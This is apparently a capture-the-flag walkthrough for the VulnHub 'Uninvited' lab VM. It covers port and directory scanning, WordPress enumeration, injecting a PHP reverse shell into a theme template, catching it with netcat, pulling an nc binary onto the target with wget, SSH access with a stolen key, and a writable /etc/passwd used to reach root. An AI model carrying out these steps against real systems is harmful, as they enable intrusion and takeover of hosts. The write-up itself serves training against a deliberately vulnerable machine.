Hack vulnhub — Uninvited
This box was presented at the at the Vulnhub Date release: 31 Jul 2020 Meetup by Jeevana Chandra
Let’s get started.
Reconnaissance
Run nmap scan
nmap -sS — min-rate 5000 — open -vvv -n -Pn -p- -oG allPorts 192.168.8.161We get the following result.
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–30 00:39 +03
Initiating ARP Ping Scan at 00:39
Scanning 192.168.8.161 [1 port]
Completed ARP Ping Scan at 00:39, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 00:39
Scanning 192.168.8.161 [65535 ports]
Discovered open port 80/tcp on 192.168.8.161
Discovered open port 60000/tcp on 192.168.8.161
Discovered open port 7894/tcp on 192.168.8.161
Completed SYN Stealth Scan at 00:39, 1.52s elapsed (65535 total ports)
Nmap scan report for 192.168.8.161
Host is up, received arp-response (0.00051s latency).
Scanned at 2021–04–30 00:39:26 +03 for 1s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
7894/tcp open unknown syn-ack ttl 64
60000/tcp open unknown syn-ack ttl 63
MAC Address: 08:00:27:95:CB:38 (Oracle VirtualBox virtual NIC)Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.69 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
We have three ports open.
- Port 80
- Port 7894
- Port 60000
We’re now checking open outlets.
nmap -sC -sV -p80,7894,60000 -oN targeted 192.168.8.161We get the following result.
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: SEC-CORP
7894/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 af:d2:42:e4:31:ff:4f:fb:0b:de:18:e9:3f:c4:bc:42 (RSA)
| 256 97:56:47:40:ea:99:b2:a6:1a:a5:59:56:7e:2b:b4:a0 (ECDSA)
|_ 256 b2:b1:67:44:75:f6:d8:32:a2:f2:ff:7f:09:a7:7d:53 (ED25519)
60000/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: UNINVITED
MAC Address: 08:00:27:95:CB:38 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 29 23:18:24 2021 -- 1 IP address (1 host up) scanned in 43.16 seconds
We see that it has HTTP port 80 , SSH port 7894 and HTTP on port 60000. Let’s explore the 80 port.
Let’s go on the site and see the source code.
We found at the bottom of the source an interesting code.
</footer> <!-- Footer section end --> <!--WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=--> <!--====== Javascripts & Jquery ======-->We found a binary encryption scheme. Let’s extract the encryption
echo “WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM” | base64 -dWe get the following resul.
Enumeration
Add the hostnames to the /etc/hosts
192.168.8.161 fieldforcewfuzz -c -t 300 — hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.8.161:60000/FUZZ
we get the following result.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************Target: http://192.168.8.161:60000/FUZZ
Total requests: 220560=====================================================================
ID Response Lines Word Chars Payload
=====================================================================000000001: 200 323 L 1076 W 22346 Ch "# directory-list-2.3-medium.txt"
000000003: 200 323 L 1076 W 22346 Ch "# Copyright 2007 James Fisher"
000000007: 200 323 L 1076 W 22346 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000014: 200 323 L 1076 W 22346 Ch "http://192.168.8.161:60000/"
000000013: 200 323 L 1076 W 22346 Ch "#"
000000012: 200 323 L 1076 W 22346 Ch "# on atleast 2 different hosts"
000000006: 200 323 L 1076 W 22346 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000002: 200 323 L 1076 W 22346 Ch "#"
000000005: 200 323 L 1076 W 22346 Ch "# This work is licensed under the Creative Commons"
000000009: 200 323 L 1076 W 22346 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000008: 200 323 L 1076 W 22346 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000010: 200 323 L 1076 W 22346 Ch "#"
000000011: 200 323 L 1076 W 22346 Ch "# Priority ordered case sensative list, where entries were found"
000000551: 200 321 L 4211 W 29673 Ch "rss2"
000000004: 200 323 L 1076 W 22346 Ch "#"
000000037: 200 19 L 91 W 1074 Ch "rss"
000000786: 301 9 L 28 W 329 Ch "wp-includes"
000000124: 301 0 L 0 W 0 Ch "0"
000000126: 200 321 L 4211 W 29673 Ch "feed"
000001632: 200 323 L 1076 W 22346 Ch "page1"
000001604: 200 318 L 4201 W 29492 Ch "rdf"
000002024: 301 0 L 0 W 0 Ch "'"
000003790: 301 0 L 0 W 0 Ch "%20"
000006627: 301 0 L 0 W 0 Ch "2020"
000007180: 301 9 L 28 W 326 Ch "wp-admin"
000007815: 302 0 L 0 W 0 Ch "backdoor"
We see several interesting directories takes us to a WordPress. login admin.
- wp-admin
- backdoor
Let’s use the following command to scan the target website for the most popular and recent vulnerabilities in WordPress
wpscan — url “http://192.168.8.161:60000" — enumerate vp,uWe get the following result.
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] It seems like you have not updated the database for some time.
y
[i] Updating the Database ...
[i] Update completed.[+] URL: http://192.168.8.161:60000/ [192.168.8.161]
[+] Started: Fri Apr 30 03:48:38 2021Interesting Finding(s):[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.8
| Found By: Headers (Passive Detection)
| Confidence: 100%[+] robots.txt found: http://192.168.8.161:60000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.8.161:60000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.8.161:60000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.8.161:60000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.8.161:60000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.8.161:60000/, Match: 'WordPress 5.4.2'[i] The main theme could not be detected.[+] Enumerating Vulnerable Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] elliot
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.8.161:60000/wp-json/wp/v2/users/?per_page=100&page=1[+] Elliot
| Found By: Rss Generator (Aggressive Detection)[+] 1
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Fri Apr 30 03:48:41 2021
[+] Requests Done: 55
[+] Cached Requests: 5
[+] Data Sent: 11.381 KB
[+] Data Received: 11.159 MB
[+] Memory used: 175.477 MB
[+] Elapsed time: 00:00:02
See username : elliot
It didn’t report any default credentials. Let’s look for accreditation data.
Visit the application in the browser.
We can see an interesting not and when you go back to the source code
which point <a href="http://www.vulture.com/2015/08/mr-robot-recap-season-1-episode-8.html">wh1ter0se</a> agrees: In 50 hours and 23 minutes, the largest hack ever will commence.</p>See password : wh1ter0se
After obtaining accreditation data, let’s register access to the control panel.
Low Shell
We log in to the admin panel and inject malicious PHP code as WordPress theme.
Login into WP_dashboard and explore the appearance tab.
Now go for theme twenty fifteen chose the templet into 404.php.
You see a text area for editing templet, inject your malicious php code here to obtain revers connection of the webserver.
Now, to proceed further, we used the reverse shell of PHP (By Penetstmonkey). And then we copied the above php-reverse-shell and paste it into the 404.php wordpress template as shown in the picture below. We have altered the IP address to our present IP address and entered any port you want and started the netcat listener to get the reverse connection.
Update the file and browse the following URL to run the injected php code.
Next, setup a listener to receive the reverse shell.
nc -lnvp 4444We get a shell
Let’s upgrade it to a better shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+ Z) and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.
stty raw -echoOnce that is done, run the command “fg” to bring netcat back to the foreground. Then use the following command to give the shell the ability to clear the screen.
export TERM=xtermUnfortunately, we’re running as user and we don’t have privileges to view the user.txt flag. Therefore, we need to escalate our privileges.
Privilege Escalation
The first thing to do when you get initial access on the box is to enumerate the filesystem to see if there are any clear text passwords. While doing that
We found a file in a directory/home/demodocker/.local. Filename note.txt
We found a binary encryption scheme. Let’s extract the encryption
echo “ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs” | base64 -dWe get the following result.
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl#Let’s extract the encryption
echo “LS0taXAtLS0vZnNvY2lldHkuZXhl” | base64 -dWe get the following result.
---ip---/fsociety.exe#It tells us there’s a downloadable file in the main directory. Let’s load the file.
After loading the file and running it in the Windows environment, it tells us that we can do a reverse listener from the 9999 or 8888 port.
Let’s carry nc file in path/tmp
This can be done by starting a python server on the attack machine.
python3 -m http.server 80Then download the archived file in the ash directory of the target machine.
wget http://192.168.8.157/ncNow change file permissions to a readable file
chmod +x ncAfter that, prepare a listener to receive the reverse cover. From inside the victim’s device on the 9999 port
Successful contact
Let’s log in using the SSH service once we can read the id rsa file inside the folder .ssh.
After the file is saved, we change the file’s permissions.
chmod 600 id_rsaNow we connect to the SSH service.
ssh docksec@192.168.8.161 -i id_rsa -p7894
After looking at a directory file /etc/passwd. We found that the file could be modified, and that allows us to step up the privilege and get a root account.
